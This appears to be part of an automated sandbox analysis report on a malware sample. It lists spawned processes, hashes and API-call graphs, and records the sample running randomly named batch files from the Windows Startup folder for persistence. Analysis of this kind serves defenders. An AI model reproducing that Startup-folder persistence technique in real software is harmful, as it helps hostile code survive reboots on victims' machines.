Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	15:22:43
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	15:22:51
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NtFoY6Vi2WtE4qAcwOzUXMHK.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	15:22:51
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	15:23:01
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v6vceHiI5YDkGCej6J99jPOi.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	15:23:01
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	15:23:14
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C8TVyoaND4r7GWzWKeeVLeMP.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	15:23:14
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	15:23:23
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fKQUct9QxCcX5qlUcu38pRMl.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	15:23:23
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	15:23:32
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IBNY7HBfHixtkjGDaljf7VCr.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	15:23:32
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	15:23:41
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jl2Nqcc7XWeOOYztXFcYbkmD.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	15:23:41
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	15:23:49
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NQwtNbU54qs5kl5tTGMFFPkC.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	15:23:49
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	15:23:57
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OK2XFEh3D7xuLDF5l083mPKW.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	15:23:57
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	15:24:06
Start date:	16/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p04DXHk7aV49bHDBuFA6B2XV.bat" "
Imagebase:	0x7ff7c0d90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	15:24:06
Start date:	16/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7403e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	24.1%
Total number of Nodes:	916
Total number of Limit Nodes:	17

Executed Functions

Function 00007FF67DCC2730 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC273F
GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC277D
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27A9
GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27BA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27C9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC2860
GetProcessAffinityMask.KERNEL32 ref: 00007FF67DCC2873

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
String ID:
API String ID: 580471860-0
Opcode ID: a6f235403c72314509f6fd457ef3fd8c232f809f8bef4b2fae904f390bc2eabd
Instruction ID: d979771497837716286a59d9ff665b2161b062e2e15b305e8566da19ec5d9522
Opcode Fuzzy Hash: a6f235403c72314509f6fd457ef3fd8c232f809f8bef4b2fae904f390bc2eabd
Instruction Fuzzy Hash: E1516D73A2878686EA509F29E840679B3A5FB44784F840B32DA4DD7364FF3CE546DB01

Function 00007FF67DCC91C0 Relevance: 2.9, Strings: 2, Instructions: 421
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Creation of WaitForGCEvent failed, xrefs: 00007FF67DCC9831
TraceGC is not turned on, xrefs: 00007FF67DCC91CA

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
API String ID: 133006248-518909315
Opcode ID: e5a1d14a811cecabfcf376ee861ea00384ee56e107421d5786fe78e1282b5c1a
Instruction ID: 13b0f62aa5a19c3e85d876a394ae3afe15f7ba0d49130869d39b7fc7420c7aee
Opcode Fuzzy Hash: e5a1d14a811cecabfcf376ee861ea00384ee56e107421d5786fe78e1282b5c1a
Instruction Fuzzy Hash: A4027F23E3E78782FA65DB61B85127462A8AF84781F154F75DA0EC77A1FF3CA4428301

Function 00007FF67DCDC3D0 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6221f1281a539eae9a028807488e3916a2c7ac0af4249366de13d0f3a776307c
Instruction ID: af2815bd8884608b8dd1178c9ec801903f1591c0a17fcc4d8cd992859e0cea23
Opcode Fuzzy Hash: 6221f1281a539eae9a028807488e3916a2c7ac0af4249366de13d0f3a776307c
Instruction Fuzzy Hash: 2362C573A7878686EB558B259A4033977A5BF88780F618B36D90ED3750FF3CE492C640

Function 00007FF67DCE07D0 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: 1a796d816c50f69b5890ba20cff1118b7a499f98528019bae5c9ec1a76721685
Instruction ID: da3ade83ead43c81857c8ba8823333913474715ae7ec9bcf37af234872dbf906
Opcode Fuzzy Hash: 1a796d816c50f69b5890ba20cff1118b7a499f98528019bae5c9ec1a76721685
Instruction Fuzzy Hash: 5F02A0A3E2D68686FA15CB25A84227837A5BF45784F058F36C84DE3261FF3CB5829641

Function 00007FF67DCDED80 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f4a378163527d27ee7393a84908dc1d63c8cfa8a30fbe58206181ead7b0ccc0
Instruction ID: 7e3fbbe1e2dabba681250029bfca1421c3813f09ae1e69cbef86deb905706ec0
Opcode Fuzzy Hash: 5f4a378163527d27ee7393a84908dc1d63c8cfa8a30fbe58206181ead7b0ccc0
Instruction Fuzzy Hash: AFF19123D3DBC245F605DB34AD012B562A9BF95384F568F36E94DD32A2FF2CB5928201

Function 00007FF67DCC22E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF67DCC234E
IsProcessInJob.KERNEL32 ref: 00007FF67DCC235E
QueryInformationJobObject.KERNEL32 ref: 00007FF67DCC238E
GlobalMemoryStatusEx.KERNEL32 ref: 00007FF67DCC23F7
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF67DCC243E
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF67DCC24B5

Strings

@, xrefs: 00007FF67DCC23DF
@, xrefs: 00007FF67DCC2433
@, xrefs: 00007FF67DCC24AA

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
String ID: @$@$@
API String ID: 2645093340-1177533131
Opcode ID: f6fcdfa56d0d25c4968f979f81b8d4dd204bf78d040e198a698aa974329dc884
Instruction ID: e526a075ba53bf9e75561f1d606f822ef138a671edffafe4ee7504f2b73f85bc
Opcode Fuzzy Hash: f6fcdfa56d0d25c4968f979f81b8d4dd204bf78d040e198a698aa974329dc884
Instruction Fuzzy Hash: 72514132719AC186EB71DF11E5403AAB7A4FB88B90F444735CA9D93B98EF7CD4468B00

Function 00007FF67DCBB0A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF67DCB57EB), ref: 00007FF67DCBB0AB

Part of subcall function 00007FF67DCC2730: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC273F
Part of subcall function 00007FF67DCC2730: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC277D
Part of subcall function 00007FF67DCC2730: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27A9
Part of subcall function 00007FF67DCC2730: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27BA
Part of subcall function 00007FF67DCC2730: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67DCBB0CA), ref: 00007FF67DCC27C9

Part of subcall function 00007FF67DCBD830: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF67DCBD92D

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF67DCB57EB), ref: 00007FF67DCBB11A
GetProcessAffinityMask.KERNEL32 ref: 00007FF67DCBB12D
QueryInformationJobObject.KERNEL32 ref: 00007FF67DCBB17E

Strings

PROCESSOR_COUNT, xrefs: 00007FF67DCBB0E6

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
String ID: PROCESSOR_COUNT
API String ID: 296690692-4048346908
Opcode ID: 7e1e5d008c002b0aa0cd323f4132cd8197a7cb78147492bad3a820433617ee8b
Instruction ID: aa56501582c02660489e6413ed332da57ea8d4f95fc2d68d9c9ed622eb0f66d5
Opcode Fuzzy Hash: 7e1e5d008c002b0aa0cd323f4132cd8197a7cb78147492bad3a820433617ee8b
Instruction Fuzzy Hash: 6531A333A2C643C6EB549F10D8802B967BAEF84344F441A35D64EC36D5FE3CE44A8700

Function 00007FF67DCB66A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF67DCB6755
RaiseFailFastException.KERNEL32(?,?,?,00007FF67DD65962,?,?,?,?,?,00007FF67DCB3B41), ref: 00007FF67DCB6781
RaiseFailFastException.KERNEL32(?,?,?,00007FF67DD65962), ref: 00007FF67DCB67BA

Strings

Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF67DCB67A6

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
API String ID: 3706814929-926682358
Opcode ID: 1c87f8d017a5f0b7b33499c6861a2261ea0fd599042be02af365e75ac2e1ff0f
Instruction ID: 8c2054e931cf411a8ce4a1c46e51d4f50655b9363081a6e9086ab623eed1aa45
Opcode Fuzzy Hash: 1c87f8d017a5f0b7b33499c6861a2261ea0fd599042be02af365e75ac2e1ff0f
Instruction Fuzzy Hash: 78415A33A79A82C6EB90CB15E44076933A8EF44B88F544A39DA4D9B3D0EF3DE4528740

Function 00007FF67DCBB3A0 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF67DCBB3C1
SetThreadPriority.KERNELBASE ref: 00007FF67DCBB3DD
ResumeThread.KERNELBASE ref: 00007FF67DCBB3E6
CloseHandle.KERNELBASE ref: 00007FF67DCBB3EF

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181873382.00007FF67DF37000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67dcb0000_SecuriteInfo.jbxd

Similarity

API ID: Thread$CloseCreateHandlePriorityResume
String ID:
API String ID: 3633986771-0
Opcode ID: f19819daf7f2dc5529685b70a43f9161d5748a4cfd19ac569aa77e37f2a15410
Instruction ID: 48be48a5cf3c6235d958ccf8df7e99be9e32bef70918ad958b219168bf91e526
Opcode Fuzzy Hash: f19819daf7f2dc5529685b70a43f9161d5748a4cfd19ac569aa77e37f2a15410
Instruction Fuzzy Hash: AFE06DAAA2470282FB16AB21AC183355751BF98BD5F484934DD8F463A0FE3C92A68604

Function 00007FF67DCC2100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF67DCC2137
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF67DCC21FC

Strings

@, xrefs: 00007FF67DCC21F4

Memory Dump Source

Source File: 00000000.00000002.2179824254.00007FF67DCB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67DCB0000, based on PE: true

Associated: 00000000.00000002.2179798235.00007FF67DCB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180073970.00007FF67DDF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2180689682.00007FF67DE57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF2F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181712976.00007FF67DF35000.00000004.00000001.01000000.00000003.sdmpDownload File
